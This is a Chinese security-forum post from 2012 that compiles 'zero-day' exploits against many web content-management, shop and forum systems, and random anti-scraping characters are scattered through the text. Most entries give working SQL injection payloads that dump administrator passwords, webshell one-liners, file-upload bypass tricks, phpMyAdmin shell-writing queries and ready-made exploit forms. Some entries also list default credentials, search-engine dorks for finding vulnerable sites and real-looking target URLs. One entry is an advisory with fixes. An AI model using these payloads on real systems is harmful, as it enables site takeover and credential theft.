找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3773|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
" w9 Y; S; d. p" D( j8 O5 x/ [1 \/ ^, S. k
直接上exploit:
* y0 {: b$ w2 d% b; W( ujavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
3 W5 L$ d9 T8 M1 R" mtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
! q9 Y& m! W5 J9 ?8 E, ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 w6 H7 X; H; O1 p5 H! P% k
Asprain论坛 注册用户 上传图片就可拿到webshell
! a$ _5 n% r+ ?% _# Y4 \8 D5 b
: ?- K6 M6 p+ r6 ^1 ?6 H/ WAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
. }- l  R) ]8 q+ x8 o1.txt存放你的一句话马 如:<%execute(request("cmd"))%>8 R8 h7 V: a) v8 b
2.gif 为一小图片文件,一定要小,比如qq表情图片
8 S$ E$ N7 X! K9 `  o" M3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用$ w# H2 Y3 G$ e
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了# X# N( J6 {& W' F
5.q.asp;.gif5 H8 r& @+ h2 W4 j& J6 b4 G. q+ {" P
google:Powered by Asprain
. T9 x! Q6 I" e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 j' V- h" Y7 {5 q$ y; ^' g& p! s/ r* O2 R7 k7 _
ShopNum1全部系统存在上传漏洞。, C) D) |( b( ^& y5 F, `8 J

8 Y4 S% d0 @! ^6 Z6 A* b6 G首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
4 j6 k4 T! H6 {3 Q. [* u按说明 提示登录后台。。+ k; h' T$ \+ o5 m
在后台功能页面->附件管理->附件列表0 t* i' ?' z# |* _, e! m
可以直接上传.aspx 后缀木马
& t6 r9 c+ H) w6 }' J/ Nhttp://demo.shopnum1.com/upload/20110720083822500.aspx
( L2 m2 s. A/ N8 D( c& s# k0 b7 O--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( m, Q2 x1 N' e0 ^. z' N' f# G8 S; s" z
牛牛CMS中小企业网站管理系统 上传漏洞
- \9 @( @! y' W% _0 l
9 V8 `- q/ ~* Q4 X. c5 X3 @- s牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
5 ?) p( S# m" o2 ?: g6 @4 E后台:admin/login.asp
% c  L) B& i( t5 J0 {6 ~ewebeditor 5.5 Nday
5 P6 I' _3 {. C0 z2 S* C. s- M0 O, bexp:
) N' R7 u3 m8 O  N6 ~9 h2 k<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?8 C! P4 P! ~6 C  L6 j4 z
<input?type=file?name=uploadfile?size=100><br><br>?, e! p6 {- n1 L4 |/ F) M
<input?type=submit?value=upload>?
2 Z2 M8 Z' n/ E$ s4 l- J3 H* g/ o</form>
2 {0 ?; @6 i0 j$ {1 rps:先上传小马.9 N* _4 h% e% y# ~1 }
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
( E- {$ L, H. E0 W$ s; b* e! I, ^3 I/ ]1 k, g; T
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% W# E# c: I' F1 w9 c7 {% G+ h6 J$ U1 ^! C$ C4 ^3 c% L1 z
YothCMS 遍历目录漏洞/ `1 e! B% Q% Q* V& `' l; t* }/ P0 H
8 Z3 M6 G% R6 [" Q! A  z# i7 x
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。* U3 W8 R4 y" e! _2 Y; [
默认后台:admin/login.asp
/ @( j9 ^( c, \$ t遍历目录:
/ i3 Y5 {1 R$ y' wewebeditor/manage/upload.asp?id=1&dir=../% x. {7 n% k# n3 ]
data:# f( Q. n- n! P0 J8 `
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
3 S+ `3 D+ \6 X: W0 m- A5 x7 ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 |& X' A- v! c4 @5 A# ^1 n) O, w( ^# X5 e6 r0 @* M- A, U; b/ z; ?' l
Net112企业建站系统 1.04 F: s) h( E* w7 {; Z
4 [  @" Y$ }! z! G. H, v; `; p
源码简介:2 u, M1 K" m* q, ]! G, ~
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。" w. f% q' A  s$ y! {. K- i
添加管理员:. _' u' z! a4 r) g8 s- N
http://www.0855.tv/admin/admin.asp?action=add&level=2
% Y/ C4 c5 ]  S' m& k$ n  d其实加不加都不是很重要,后台文件都没怎么作验证。! N5 m: P4 @* M: x
上传路径:
! U" m) N1 {9 D" I3 O/ q7 ihttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
1 M1 Q7 h3 u. ~3 [( E6 Whttp://www.0855.tv/inc/Upfile.asp?Stype=2
/ n! i9 y. m$ O0 I怎么利用自己研究。: S+ Z6 X& J2 f
遍历目录:# f# `( ?1 m7 S& L. b7 R# v( ]
http://www.0855.tv/admin/upfile.asp?path=../..) j1 k" Y; u+ q7 m; b8 @. D
如:4 V+ j9 e/ M5 L" q' z: g
http://www.0855.tv/admin/upfile.asp?path=../admin( z% B/ i* U+ h
http://www.0855.tv/admin/upfile.asp?path=../data1 M* [7 b6 @$ h6 O  P/ N* t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 M" i% e4 V8 u. J) D- ~
6 w/ P; u& V) C- @易和阳光购物商城通杀 上传漏洞! W" J) L& d- O. m# y+ F9 e

' h$ l% ]( _6 c% c' X% o$ Z前提要求是IIS6.0+asp坏境。
7 h! y! e. ?; l9 w; g8 I漏洞文件Iheeo_upfile.asp
9 T( |' |4 W; v' C4 C! o过滤不严.直接可以iis6.0上传
9 W6 ]( P- L; Y6 Z9 Z* M把ASP木马改成0855.asp;1.gif9 @, s! ?4 O6 N! f/ F. I/ b  Y- r
直接放到明小子上传6 F7 ^! d; @4 n3 w/ ~6 y3 C4 n4 U
Google搜索:inurl:product.asp?Iheeoid=
9 p7 O8 c. t. ~* Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 y# z7 K( W% R+ z: p2 a6 x% \! b

! E! k/ r/ S1 C. w: l6 nphpmyadmin后台4种拿shell方法; [1 v' x. Z6 Z. K

( m, W3 w5 m7 F5 m$ N2 U* z: e- t方法一:
% x5 I- p! }+ {CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
2 K  N& {7 j$ KINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');- \: a, O; y! P* g2 s
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';/ ?  Y2 Q, n; W) @% }2 R% L; ?8 }
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php+ D1 y4 R# a, R3 K
一句话连接密码:xiaoma
5 K) G- C4 h- w2 C' E& n% S方法二:
+ O% h- Z6 Z. g" b0 g' QCreate TABLE xiaoma (xiaoma1 text NOT NULL);
6 b* x2 m7 I9 B- pInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');: ?4 Q6 l1 k/ B; G
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
) ^8 i* w7 U& X2 E7 `Drop TABLE IF EXISTS xiaoma;6 U" E% T6 l6 x/ z  i
方法三:; C3 T; R8 j1 g8 s
读取文件内容:    select load_file('E:/xamp/www/s.php');* s( O4 W" R* H
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'$ |& B% y% f( _  h
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
, p2 g+ W7 p$ z) k5 A' t. y方法四:  \3 u+ P4 r! j& k; ]
select load_file('E:/xamp/www/xiaoma.php');( z% R4 N5 U' C2 o6 ?* J# h
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'# J9 \7 t6 Q# R* e( K; {) m
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir7 d  w7 F6 N5 @( O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: H, d, \" [- h

/ ~6 @. w7 W) u6 T  E传信网络独立开发网站源码0day漏洞9 o; K7 R' S; Q: |: G8 A
# u2 y/ l* E* l* I
后台system/login.asp" w  A0 @. E( y2 W
进了后台有个ewebeditor$ l( h* v( q; J: N# q
Google 搜索inurl:product1.asp?tyc=* v3 f3 a8 ^/ _  `1 z
编辑器漏洞默认后台ubbcode/admin_login.asp: }+ A' l. z. r0 d% P
数据库ubbcode/db/ewebeditor.mdb
- m5 I8 n+ a- X# L默认账号密码yzm 111111% e6 z3 N. Y* p' M6 p' k1 I8 Z7 B

! T( O4 \5 [& E# g. W拿webshell方法
+ Y9 h; h! N( V9 K( Z; {登陆后台点击“样式管理”-选择新增样式
; L) t; F' G# R& \样式名称:scriptkiddies 随便写 , B9 t" w( @" F: z
路径模式:选择绝对路径
- l# G9 E. y6 J图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx1 D! H5 n& D4 T4 H
图片类型比如就是我们要上传的ASP木马格式
. N* Y0 r; q% _: ^$ i上传路径:/
1 F3 o4 G# N9 t9 x. x图片限制:写上1000 免的上不了我们的asp木马
) X# x1 Y* a. ^9 l& b1 T上传内容不要写
5 K4 \3 Q. ~/ E  z9 v可以提交了 8 g' Y( c9 z/ _* V1 p( d
样式增加成功! ' ^- l' Y, K2 Q- A" X5 c1 m4 F
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 7 D' w/ E* ?0 W" u( R% `
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置" I: y4 p# N: P* z! w
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
: @' {  |# M2 ]0 R* ^$ g上ASP木马 回车 等到路径# y0 s1 p- L4 p- T# ^+ X
9 A  Q6 T3 X" e
后台:system/login.asp
" j* Q3 X& j/ X, }' m1 N+ }7 ?Exp:
  m7 |; o5 e. {7 p% Oand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 A9 A4 R$ \" x* \9 k5 n+ u测试:
& X. ~# V0 L+ `8 Fhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master4 u7 ?1 K* i6 v2 j
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
+ w' H& @; c4 r9 e6 F+ P; [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* }4 C- P( i( j3 U" p

0 `8 g" g2 X7 d+ J2 Ofoosun 0day 最新注入漏洞
# S. ?" `  g; c  n/ Z. W/ h1 ~& X4 v, d( i. ?
漏洞文件:www.xxx.com/user/SetNextOptions.asp
: }$ R0 Y) l$ b* Y. j# O利用简单的方法:0 Z, _+ M0 Z' f
暴管理员帐号:# b- n. @6 ^( m, @' g- B6 l
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
0 g' D1 ~6 m( T5 Z& N5 }" n暴管理员密码:
6 O- M& K1 f9 F+ x9 K5 Khttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,: c7 k. k& {  h0 U$ X3 k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. W- C1 @  ~' W5 {1 ~4 b8 K

4 Y: g4 [9 K( Z/ H5 y网站程序的版权未知!( |3 H" n& w& E4 e# \
$ U6 w7 ^* d' S5 u- |. b
默认网站数据库:" X6 x. U! T1 w
www.i0day.com/data/nxnews.mdb9 x2 }+ @' n7 `, X1 W1 Q* ], Q
ewebeditor 在线编辑器:9 P: w4 E. E9 ?( p
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb& y7 N& s# H- X5 c' Y3 X) T
登录地址:ewebeditor/admin_login.asp. s+ M! h2 v! E  r
默认密码:admin  admin
' X8 R( c# J. V5 B6 T) z登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
: Q+ O+ g$ \  L7 {9 t; _0 }1 }/ r5 t, I' I
Sql注入漏洞:
  E" J# D5 ^! V3 x4 p# B" ^http://www.i0day.com/detail.asp?id=12
; A' T4 ^2 ~" V, a- }. Wexp:
* J  G( J2 C, M! M3 N6 m* m. funion select 1,admin,password,4,5,6,7,8 from admin
! L5 f5 p3 X- L# v& Z7 U# k爆出明文帐号/密码5 E( J0 v: q& @9 `
2 g1 g3 U7 r% S8 l0 o" X
上传漏洞:/ w' S  P+ Y0 c5 Q. Y
后台+upfile.asp
/ o" N* z1 H+ O# _' C& A, [如:
7 P, G1 _: L3 K$ F* C+ a& Ihttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。- e6 Q& [" {+ t  }- D3 e9 x
shell的地址:网址+后台+成功上传的马2 \& |$ q, E/ d' i
google:inurl:news.asp?lanmuName=
) z& a, P% j0 b: L. v8 }------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ B7 W  x. T8 w" Z% H5 N+ {
5 h+ O8 D3 m  P0 Z" odedecms最新0day利用不进后台直接拿WEBSHELL' k2 ]2 P7 w: t' k/ a3 n
  M0 J8 F5 }: M: S
拿webshell的方法如下:* x% i# o0 b% P6 W
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.1 ?" R  a- A5 |. Q) y* ?
前题条件,必须准备好自己的dede数据库,然后插入数据:
% e5 G3 T' `$ O; d! @8 Qinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); . A7 f" U3 N( f8 ?! J6 T" n

' P8 M) O) D" G2 E再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。  E4 M1 f  Y( I* ^
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
2 U. n  ?, P$ r' J" w# |<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />: C- L9 u. M- }9 m7 M& Z
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
3 {9 _+ [. C4 ^1 B: \, K) {! Z9 C* F. {<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />( s2 A+ V  w8 m
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
* F6 @  E3 [: |: t; e5 K+ h1 W7 w<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
: m- u5 p9 M: F" c" k<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />( G9 [" V3 M8 X4 @  i2 \% f# Z
<input type="text" value="true" name="nocache" style="width:400">
+ @5 Z5 j: P+ A  M4 M2 g<input type="submit" value="提交" name="QuickSearchBtn"><br />: Z: n# Q) i- ~
</form>
- ]+ k& _+ y3 n; Z* X<script>
) _8 A  F# x  E; {' h" f2 ffunction addaction()
- ?! j- s( c5 N3 h8 ]. S+ R5 a1 X{
- j& E; ?1 j. \5 edocument.QuickSearch.action=document.QuickSearch.doaction.value;# Z$ }# j: _  q5 x
}- v( |4 T0 K0 C$ P  B
</script>/ [- r5 ]% y, Y# C, y- g/ o9 T
-----------------------------------------------------------------------------------------------------------------------------------------------9 X  t* i. e( v, g& ~# o
! a7 J- ~7 n6 l: \) A6 F& s! A
dedecms织梦暴最新严重0day漏洞5 E! F; u7 Q2 r/ \& }8 o8 J
bug被利用步骤如下:( j: t, z" m9 V) Z# H
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root- {% D% @$ r, H4 }# z' a
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
( l0 T5 Y. i) Z5 ]# o, T7 R. R-------------------------------------------------------------------------------------------------------------------------------------------. t) d: y( s5 c& T
& C6 f4 N, N+ d9 G8 E6 a9 ~
多多淘宝客程序上传漏洞
/ F6 P  Z/ T# x0 [5 [漏洞页面:
: k  Y5 D$ R  V3 Y9 dadmin\upload_pic.php
. p' J% g; u7 j# |, w* I传送门:
5 n5 A6 N/ Y: Khttp://www.www.com/admin/upload_pic.php?uploadtext=slide1( ]. e0 R! ]5 D% J/ Y' j
PS:copy张图片马 直接  xxx.php 上传抓包地址!: ]/ t; b" _' r9 z8 d5 h" Q
------------------------------------------------------------------------------------------------------------------------------------------------------  V3 R; J3 S" ~3 H( U' D: x7 p6 R
( t& T* s& y5 K/ q6 V
无忧公司系统ASP专业版后台上传漏洞
1 r6 H8 S0 q9 P/ {* G' M% C漏洞文件 后台上传  ]" l2 }6 V' j; F, x2 g$ W
admin/uploadPic.asp! ?- o- K4 X% w) @% ]" i$ I
漏洞利用 这个漏洞好像是雷池的
* ]" F: m. c0 q% k% yhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=19 f" c9 N2 {$ Y* M" E0 v
等到的webshell路径:
. j8 a6 \! N: I: o! l8 Q( |/UploadFiles/scriptkiddies.asp;_2.gif8 `4 W" E6 n) w0 R: [
---------------------------------------------------------------------------------------------------------------------------------------------------$ v# t8 f9 L$ ]8 x6 s  A

6 m9 N' x: x) F: B- B住哪酒店分销联盟系统20104 C# R, C, \. a+ O
Search:, E! S8 A0 o8 a/ R/ _, A
inurl:index.php?m=hotelinfo
/ I# t! Z% G; @* _: @' @+ I5 qhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
8 e7 A- V& X5 T& z) j* m1 ^3 D默认后台:index.php?m=admin/login
) Y# f" z5 k6 n! K--------------------------------------------------------------------------------------------------------------------------------------------------) @; t5 ^" y" [9 E+ k# b+ ]: T( D
' S* W. B6 ~6 ~- p+ [4 v7 Z
inurl:info_Print.asp?ArticleID=
/ y1 D& [  u( ^* a+ R+ |后台 ad_login.asp
  h& k" H2 c/ A& S& ?2 q爆管理员密码:
" N9 w$ o$ n7 Y; O* \2 S4 B+ uunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
8 c& S" u* [, @: m! b------------------------------------------------------------------------------------------------------------------------------------------------------------0 {+ e4 G! y2 o" H5 P1 h% v1 Y" J

/ v+ G/ R, T  {: \+ M搜索框漏洞!: e! N3 n; v+ i2 x
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
* \3 T1 Y/ ^3 ]" S- m+ q3 s--------------------------------------------------------------------------------------------------------------------------------------------------------4 ]) R9 h; Z  T) {) a1 g
% c$ _: E5 d, e$ s9 j
关键字:$ N; v# A( z/ X+ [- r9 p! p
inurl:/reg_TemletSel.asp?step=2
/ t5 n6 M2 W7 D/ S7 p4 J或者
( P- m+ C# ?/ i9 w" D. g电子商务自助建站--您理想的助手5 j* d' h* |1 w7 O2 {
-------------------------------------------------------------------------------------------------------------------------------------------------
4 o0 o+ u) K8 M3 M! R# [" X; d5 P$ I0 |% a% |
iGiveTest 2.1.0注入漏洞) T( U1 @3 J4 ]. s
Version: <= 2.1.0
9 e" F( w2 t* X* b0 o, p# Homepage: http://iGiveTest.com/
! x; B" A3 s# g2 Y) ]谷歌关键字: “Powered by iGiveTest”% O' }+ F" K; A$ `; V
随便注册一个帐号。然后暴管理员帐号和密码
; r6 j" Z2 O! ?7 Z) L2 w6 C" Zhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (12 E) E2 W0 M- }/ a, L' b
------------------------------------------------------------------------------------------------------------------------------------------------
1 l9 m3 `* `& t, o0 M: X/ M; _' L: a" L) @2 F: q, S
CKXP网上书店注入漏洞: j2 k: h& S+ m  Z! p1 f) b8 ~
工具加表:shop_admin 加字段:admin
- ^3 }8 A/ F5 i) r  S5 L% ]后台:admin/login.asp . t' o2 V' y1 o6 n* G- Q& z
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
2 T) J  d5 G. Ninurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; }8 t# g; g5 q* R) f$ [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 e6 L' K2 x" V) W; v+ v
- a) X( P0 b( o5 F
段富超个人网站系统留言本写马漏洞
9 I6 }! {5 s& T3 q3 f源码下载:http://www.mycodes.net/24/2149.htm
1 g9 [3 m, ^3 N. T# |  Vaddgbook.asp 提交一句话。
2 c$ X: Z. u( i8 ?4 g连接: http://www.xxxx.tv/date/date3f.asp
8 B2 F" X( v% V7 [google:为防批量,特略!' {# v, x" p: {& Y
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 @: E# W6 L2 }8 O, M# n  _5 S. ~$ i* Y* r; O
智有道专业旅游系统v1.0 注入及列目录漏洞% i# D' ^7 g: v
默认后台路径:/admin/login.asp# `& W4 v4 y6 b: [; L
默认管理员:admin
; |# E5 M' ^! L9 k/ u6 B默认密码:123456
/ E+ R+ b$ s  T7 NSQL EXP Tset:
" G% Z$ V+ Z" m# ohttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin, f$ {( `' a1 I- o6 ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 T6 b3 }  o+ `7 W2 O" M( y
" Q8 B( N( z5 Q$ X3 K- fewebeditor(PHP) Ver 3.8 本任意文件上传0day: g' b3 O0 {6 l
EXP:
8 E8 t' ?$ f* H1 t! l<title>eWebeditoR3.8 for php任意文件上EXP</title>  n) `' k. W- r. t
<form action="" method=post enctype="multip$ \1 g- v/ h0 D" O2 A
art/form-data">
' ~  l0 B8 p# z<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 6 z8 U. ^" [; X; ]1 d! A- e
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
" I+ B" D$ P; m) x3 v<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
7 T9 A: T, W* {9 P$ S, Hfile:<input type=file name="uploadfile"><br>
- v9 C/ ~9 n4 a( ~& E<input type=button value=submit onclick=fsubmit()>
* X6 `  v) N7 v- K8 W! |& l</form><br> 3 M+ g+ K. [, J- @' U; p9 ]
<script> % u$ W/ T4 u8 F! W9 L
function fsubmit(){
& ^1 Y( T% S5 z; Zform = document.forms[0]; 9 m4 k+ z( i/ Y1 p6 F" E& _
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; . e# J3 Q7 H( z2 k* r. V
alert(form.action); ! c3 Q; A+ w) k& L/ W
form.submit();
' C' A+ L: A: [+ F2 T} 6 O7 R7 _  v  \. d  D
</script>
& t' E) [" Q( j注意修改里面ewebeditor的名称还有路径。9 [/ c+ f' G% P- f
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( L. Z' N( r0 L8 ?& U' [
7 p/ q" K  [9 U+ V/ }( ^
提交’时提示ip被记录 防注入系统的利用
& l- j6 F+ e6 ?, }网址:http://www.xxx.com/newslist.asp?id=1228 |( w( W6 e; U+ v# z* x7 n6 g' a
提示“你的操作已被记录!”等信息。' }) E" S) m$ H3 S# }; F- ], `
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。$ p* e, X& W2 O% J
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 g' u- V' S3 G

$ s# ?; o! d: b- t西部商务网站管理系统 批量拿shell-0day4 U8 y* i+ E: s  s
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
7 S2 N$ ~! f+ l* t1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛' W9 D2 p! e9 {9 Q3 q
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
" ~4 s- z- Y8 I+ b3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
8 {! I) Q. K5 Q---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ }* F1 U# D; ^
' F3 d: o+ F$ q! W* L" k& T  ?
JspRun!6.0 论坛管理后台注入漏洞3 j* }1 a9 |; n
- R( e' j- E2 n) |$ w5 b" _/ u
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
3 g4 H7 O! z3 W# k" iJspRun!6.0
! U2 k) A$ r2 o; d* g( }漏洞描述:
* Q3 |6 B# y8 nJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。  b/ P& j' ^2 V- U/ e# B
在处理后台提交的文件中ForumManageAction.java第1940行
) e3 a+ r. H: j2 R# R" ?String export = request.getParameter("export");//直接获取,没有安全过滤
$ b4 |9 A. K: d+ Qif(export!=null){
9 L1 O. [/ A/ Y# N: \6 Z& q$ rList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
% ^/ O$ y" y) fif(styles==null||styles.size()==0){9 _6 r$ ?# H2 w
<*参考/ q% y) S% r1 j, S
nuanfan@gmail.com% U: V( l$ F. ?8 F  C$ O
*> SEBUG安全建议:6 k" i* T6 x5 X; y
www.jsprun.net
$ D& d8 V3 }: r4 |( c( C(1)安全过滤变量export2 ], |- L2 A; f, d  x  N0 N
(2)在查询语句中使用占位符3 L* l6 r. L& L4 G
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 Y4 {( F% p% y, Q/ ^* a- a9 m' u& p0 v# M& n* \! |  A$ k. p
乌邦图企业网站系统 cookies 注入
5 b$ ^* p1 h5 \8 ^3 B
; j% A% l1 v$ E* _% \2 ]程序完整登陆后台:/admin/login.asp
- x3 c3 H) D' q7 p; m  V默认登陆帐号:admin 密码:admin8882 j' P) ~& ~" Y5 I' y' Y9 \# b
语句:(前面加个空格)/ I: [- C2 _, D
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin! L8 e( K9 X$ y: u
或者是16个字段:' F/ T* E) h, W. H; _
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin6 V+ ^, n8 X8 o, |& }' d* ?
爆不出来自己猜字段。
) i$ W" R9 K! E注入点:http://www.untnt.com/shownews.asp?=88
: f2 q! I8 U3 j# [getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
) I- Q# T/ z: K' _/ l( P关键字:7 u5 d1 n; j: _, r  J+ I
inurl:shownews?asp.id=/ _  P6 W& Y, k% Z* f
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, l8 n+ Y8 S$ l9 R7 {) E0 o( y* `9 L, M% J. V/ \. R7 a
CKXP网上书店注入漏洞
/ Q  b2 |& T& d, D% O# p7 g" J9 K2 `6 H5 F4 q4 q
工具加表:shop_admin 加字段:admin
* C# s6 V% |( {后台:admin/login.asp - h1 l  |# j  ]: _: K
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/& ?6 `& i; h; R3 {) n% c; P: {
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
% O! w; A+ A& g% r& ~6 I  R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 g# |: M5 t( S7 l+ l

  v2 @4 \+ m4 i+ A" OYxShop易想购物商城4.7.1版本任意文件上传漏洞% O1 a) G7 F9 ?* z1 B2 V
1 t* _8 D4 {$ g; g8 S8 I; }
